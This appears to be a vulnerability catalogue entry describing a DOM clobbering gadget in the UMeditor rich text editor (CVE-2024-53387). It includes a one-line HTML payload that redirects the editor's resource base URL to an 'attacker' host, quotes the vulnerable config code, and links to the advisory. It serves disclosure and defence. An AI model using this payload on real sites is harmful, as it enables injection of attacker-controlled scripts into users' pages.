.. / umeditor

Star Fork

UMeditor, referred to as UM, is a simplified version of ueditor. It is an online rich text editor specially customized to meet the needs of portal websites for simple post boxes and reply boxes.

≤1.2.2 | CVE-2024-53387

<a> @id 🛡️ strict-dynamic ⏱️ before-load

• The UMeditor library was relying on the #UMEDITOR_HOME_URL anchor to configure its base URL for loading resources. By clobbering it, it was possible to load arbitrary ressources.

  <a id="UMEDITOR_HOME_URL" href="http://attacker/"></a>

  Copy

var URL = window.UMEDITOR_HOME_URL ||

window.UMEDITOR_CONFIG = {

    //为编辑器实例添加一个路径，这个不能被注释
    UMEDITOR_HOME_URL : URL

Related links:

• https://github.com/advisories/GHSA-35g5-m5m3-r8mx
• https://gist.github.com/jackfromeast/d52c506113f33b8871d0e647411df894
• https://github.com/jackfromeast/dom-clobbering-collection/blob/main/domc-gadgets/umeditor.md
• https://github.com/fex-team/umeditor/blob/30b87925e7c725ec1ec6c487d4d80967cbcb58e3/umeditor.config.js#L26-L42
• https://jackfromeast.github.io/assets/DOMinoEffect.pdf

Found by jackfromeast, ishmeals.

Source | History